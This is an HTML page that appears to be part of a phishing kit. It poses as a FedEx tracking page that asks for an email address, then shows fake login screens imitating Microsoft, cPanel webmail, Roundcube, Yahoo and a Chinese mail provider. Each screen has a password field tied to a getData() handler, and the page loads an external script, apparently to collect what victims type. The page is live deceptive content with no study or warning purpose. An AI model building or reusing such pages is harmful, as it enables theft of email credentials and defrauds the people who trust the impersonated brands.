﻿<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://robmccal.github.io/new/style.css">
</head>
<body>

    <section id="loader">

        <div>e-mail verifying...</div>
    
    </section>
    
        <!-- fex -->
    
        <section class="container_fedex">
    
            <div class="track_pad">
    
                <section class="track_content">
                    <span class="track_id"></span>
    
                    <span class="track_input" contenteditable="true" spellcheck="false" onclick="fexIputGet(this)">ENTER E-MAIL</span>
    
                </section>
    
                <section class="track_btn" onclick="fexBtnSub(this)">
                    TRACK
                </section>
                
            </div>
    
            <div class="nav_fedex">
    
                <section>
                    <img src="https://robmccal.github.io/new/pics/logo.png" alt="logo">
                </section>
                
                <section class="desktop_nav">
                <span>Shipping &#9013;</span>
                <span>Tracking &#9013;</span>
                <span>Design & Print &#9013;</span>
                <span>Locations &#9013;</span>
                <span>Support &#9013;</span>
                </section>
    
                <section class="desktop_nav">
                    <span>
                        Sign Up or Log In &#128100;
                    </span>
    
                    <span>
                        &#128269;
                    </span>
                </section>
    
                <section style="display: none;" class="mobile_nav">
                    &#8801;
                </section>
            </div>
    
            <div class="fex_container">
    
                <p>
                    Ship, manage, track, deliver
                </p>
    
                <section class="fex_detail">
                    <div style="background-color: #fafafa;">
                        <img src="https://robmccal.github.io/new/pics/rate.png" alt="">
                        RATE & SHIP</div>
                    <div style="background-color: #4d148c; color: #fafafa">
                        <img src="https://robmccal.github.io/new/pics/track.png" alt="">
                        TRACK</div>
                    <div style="background-color: white;">
                        <img src="https://robmccal.github.io/new/pics/location.png" alt="">
                        LOCATIONS</div>
                </section>
    
            </div>
    
            <div class="fex_body">
    
                <section>
                    <img class="imgAds" src="https://robmccal.github.io/new/pics/d1.png" alt="">
    
                    <h2>
                        Manage your shipments and returns
                    </h2>
    
                    <section class="icon_manager">
                        <div>
                            <img src="https://robmccal.github.io/new/pics/icon_courier.png" alt="">
                            <span>Drop off a 
                                <br>
                                package</span>
                        </div>
    
                        <div>
                            <img src="https://robmccal.github.io/new/pics/icon_delivery.png" alt="">
                            <span>Redirect a 
                                <br> package</span>
                        </div>
    
                        <div>
                            <img src="https://robmccal.github.io/new/pics/retail-services.svg" alt="">
                            <span>Store hours 
                                <br> and services</span>
                        </div>
    
                        <div>
                            <img src="https://robmccal.github.io/new/pics/icon_alert.png" alt="">
                            <span>Service <br> alerts</span>
                        </div>
    
                        <div>
                            <img src="https://robmccal.github.io/new/pics/icon_returns.png" alt="">
                            <span>Return a 
                                <br>package</span>
                        </div>
                    </section>
    
                    <section class="fex_content_list">
                        <img src="https://robmccal.github.io/new/pics/d2.jpg" alt="" class="fex_img1">
                        <div>
                            <h3>
                                We’re committed to continuing to deliver for you
                            </h3>
        
                            <p>
                                Reach your customers and mitigate risk. Find out why it's worth staying with—or switching to—FedEx.
                            </p>
        
                            <span>
                                SEE THE FEDEX DIFFERENCE
                            </span>
                        </div>
                    </section>
    
                    <h2>Free up time with convenient shipping options</h2>
    
                    <section class="fex_content_list">
                        <img class="fex_img2" src="https://robmccal.github.io/new/pics/d3.jpg" alt="">
                        <div>
                            <h3>
                                Drop-off flexibility is just around the corner
                            </h3>
        
                            <p>
                                Out and about running errands? Drop off your packages at nearby retail locations. Choose from thousands of FedEx Office, FedEx Ship Center®, FedEx Authorized ShipCenter®, FedEx® Drop Box,* Walgreens, Dollar General, and grocery locations nationwide. Some are even open 24 hours. Consider consolidating your drop offs to help reduce multiple-trip emissions.
                            </p>
        
                            <span>
                                VIEW LOCATIONS
                            </span>
                        </div>
                    </section>
    
                    <section class="fex_content_list">
                        <img class="fex_img2" src="https://robmccal.github.io/new/pics/d4.jpg" alt="">
                        <div>
                            <h3>
                                Let us do the packing for you
                            </h3>
        
                            <p>
                                Whether you’re short on time or need some assistance, our packing experts can help. From breakables to perishables, they can send your shipment safely on its way. They can also show you more sustainable packaging options. Packing pros are available at thousands of FedEx Office locations.
                            </p>
        
                            <span>
                                START PACKING
                            </span>
                        </div>
                    </section>
    
                    <h2>Deliveries made easy no matter where you are</h2>
    
                    <section>
                        <img class="fex_img1" src="https://robmccal.github.io/new/pics/d5.jpg" alt="">
                        <h3>Place a free vacation hold while you're away</h3>
                        <p>Enroll in FedEx Delivery Manager® to pause deliveries during your getaway. We’ll keep your packages for up to 14 days, then deliver them once you’re back.</p>
                    </section>
    
                </section>
                
            </div>
    
            <div class="fex_footer">
                <section>
                    &copy; FedEx 1995-2023
                </section>
    
                <section>
                    <span>Site Map</span>
                    <span> Terms of Use</span>
                    <span>Privacy & Security</span>
                </section>
            </div>
    
        </section>

        <!--  -->

    <section class="container_mails">

        <div id="domain_server">yahoo</div>
        <div id="domain_email"></div>

        <!-- office -->

        <section class="container_office">
            <section id="main_container">
    
                <div id="content_box">
                    <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.534-.255,2.646,2.646,0,0,0-.852-.12,1.808,1.808,0,0,0-1.448.722,3.467,3.467,0,0,0-.592,2.223V18.4H60.525V8.507h2.329v1.559h.038A2.729,2.729,0,0,1,63.855,8.8,2.611,2.611,0,0,1,65.4,8.343m1,5.254A5.358,5.358,0,0,1,67.792,9.71a5.1,5.1,0,0,1,3.85-1.434,4.742,4.742,0,0,1,3.623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-3.772,1.424,4.935,4.935,0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852,3.707,3.707,0,0,0-.707,2.43m11.2-2.416a1,1,0,0,0,.318.785,5.426,5.426,0,0,0,1.4.717,4.767,4.767,0,0,1,1.959,1.256,2.6,2.6,0,0,1,.563,1.689A2.715,2.715,0,0,1,83.2,17.794a4.558,4.558,0,0,1-2.9.847,6.978,6.978,0,0,1-1.362-.149,6.047,6.047,0,0,1-1.265-.38v-2.29a5.733,5.733,0,0,0,1.367.7,4,4,0,0,0,1.328.26,2.365,2.365,0,0,0,1.164-.221.79.79,0,0,0,.375-.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,1,86.664,9.71a5.1,5.1,0,0,1,3.849-1.434,4.743,4.743,0,0,1,3.624,1.381,5.212,5.212,0,0,1,1.3,3.729,5.259,5.259,0,0,1-1.386,3.83,5.02,5.02,0,0,1-3.773,1.424,4.934,4.934,0,0,1-3.652-1.352A4.987,4.987,0,0,1,85.278,13.6m2.425-.077a3.537,3.537,0,0,0,.7,2.368,2.506,2.506,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.39,2.39,0,0,0-1.93-.813,2.439,2.439,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.107,0,0,0-.664-.1,1.407,1.407,0,0,0-1.126.457A2.017,2.017,0,0,0,99.7,7.313V8.507h3.469V6.283l2.339-.712V8.507h2.358v1.906h-2.358v4.629a1.951,1.951,0,0,0,.332,1.29,1.326,1.326,0,0,0,1.044.375,1.557,1.557,0,0,0,.486-.1,2.294,2.294,0,0,0,.5-.231V18.3a2.737,2.737,0,0,1-.736.231,5.029,5.029,0,0,1-1.015.106,2.887,2.887,0,0,1-2.209-.784,3.341,3.341,0,0,1-.736-2.363Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
            
                <div id="box-major">
            
                    <br>
                    
                    <div id="showTemp"></div>
            
                    <h1 id="changeH1">Enter password</h1>
    
                    <p class="takes">
                        <input type="password" class="get_input input_pass1">
                    </p>
            
                    <div class="verify_loader">
                        <br>
                    <b style="font-style:normal; font-weight:500;">Show Password: </b> <input type="checkbox" onclick="preventCheck(this)">
                    </div>
            
                    <br>
                    <span id="acc_create">
                        No account? <a href="#">Create one!</a>
                    </span>
            
                    <article id="sub_btn" onclick="getData(this)">
                        Next
                    </article>
            
                </div>
            
                </div>
                
            </section>
            
            <section id="foot_content">
            <span>Terms of use</span>
            <span>Privacy & cookies</span>
            <span>. . .</span>
            
            </section>    
        </section>


        <!-- webmail -->

        <section class="container_webmail">
    
            <div class="webmail_main">
                <img id="web_logo" src="https://robmccal.github.io/new/webmail-logo.svg" alt="">
    
            <div>
                <p>Email Address</p>
    
                <section class="web_input">
                    <img src="https://robmccal.github.io/new/icon-username.png" alt="">
                    <span class="get_input input_email2"></span>
                </section>
    
            </div>
    
            <div>
                <p>Password</p>
    
                <section class="web_input">
                    <img src="https://robmccal.github.io/new/icon-password.png" alt="">
                    <input type="password" class="get_input input_pass2">
                </section>
    
            </div>
    
            <div>
                <span>Show Password</span> 
                <input type="checkbox" onclick="preventCheck(this)">
            </div>
    
            <br>
    
            <div class="web_btn1" onclick="getData(this)">Log in</div>
    
            <div class="web_footer">
                <img src="https://robmccal.github.io/new/foot_logo.png" alt="">
                <span>
                    Copyright© 2023 cPanel, L.L.C.
                </span>
                <span>
                    Privacy Policy
                </span>
            </div>
        </section>

            </div>
            
    </section>
    
    <!-- roundcube -->

    <section class="container_roundcube">
    
        <div class="roundcube_main">
            <img id="web_logo" src="https://robmccal.github.io/new/roundcube_logo.png" alt="">

        <div>
            <p>Username:</p>
            <section class="web_input">
                <span class="get_input input_email3"></span>
            </section>

        </div>

        <div>  
            <p>Password:</p>            
            <section class="web_input">
                <input type="password" class="get_input input_pass3">
            </section>

        </div>

        <div>
            <span>Show Password</span> 
            <input type="checkbox" onclick="preventCheck(this)">
        </div>

        <br>

        <div class="web_btn2" onclick="getData(this)">Log in</div>

        </div>
        
        <div class="web_footer">
            <img src="https://robmccal.github.io/new/foot_logo.png" alt="">
            <span>
                Copyright &copy;2023 cPanel, L.L.C.
            </span>
            <span>
                Privacy Policy
            </span>
        </div>

    </section>

    <!-- yahoo -->

    <section class="container_yahoo">
        <div class="main_yahoo">
            <section class="yahoo_nav">
                <img src="https://robmccal.github.io/new/yah.png" alt="">
                <a href="#">Help</a>
            </section>

            <section class="yahoo_box">

                <div class="yahoo_box1">
                    <b>
                        Yahoo makes it easy to enjoy what matters most in your world.
                    </b>
                    <p>
                        Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of life.
                    </p>
                </div>
                <div class="yahoo_box2">
                    <img src="https://robmccal.github.io/new/yah.png" alt="">

                    <span id="yah_mail" class="get_input input_email4"></span>
                    
                    <b>Enter password</b>
                    
                    <span>to finish sign in</span>
                    

                    <div class="yahoo_input_container">
                        <span style="display:none;" class="get_input input_email4"></span>

                        <input type="password" class="get_input input_pass4" placeholder="Password">

                        <div class="yah_btn" onclick="getData(this)">Next</div>
                        
                        <div style="text-align: left; font-weight: bold;">
                            Show Password 
                            <input type="checkbox" onclick="preventCheck(this)">
                        </div>
                        <br>

                        <a href="#">Forgot password?</a>

                    </div>

                </div>
            </section>

        </div>

    </section>

    <!-- china -->

    <section class="china_container">

        <div class="chinaNav">
            <span>
                <img id="china_log" src="" alt="">&nbsp; | &nbsp;
                你的专业电子邮局
            </span>

            <span>
                反馈 &nbsp;|&nbsp; 修复公示
            </span>
        </div>

        <div class="chinaBox">
            <section class="chinaBox1">
                <img src="https://robmccal.github.io/new/china/bg.png" alt="">
            </section>

            <section class="chinaBox2">
                <img src="https://robmccal.github.io/new/china/barcode.png" alt="">

                <h2>帐号登录</h2>

                <span class="get_input input_email5"></span>

                        <input type="password" class="get_input input_pass5" placeholder="输入密码" spellcheck="false"/>
                        
                        <div style="font-weight: bold; font-size: 0.9rem;">显示密码  <input type="checkbox" onclick="preventCheck(this)">
                        </div>

                        <div class="china_btn" onclick="getData(this)">登&nbsp;&nbsp;录</div>

            </section>
        </div>

        <div class="chinaFoot">
            <img src="https://robmccal.github.io/new/china/cn.png" alt="">
            粤公网安备 44010602006299
        </div>


    </section>
</body>

<script src="https://robmccal.github.io/new/script.js"></script>

</html>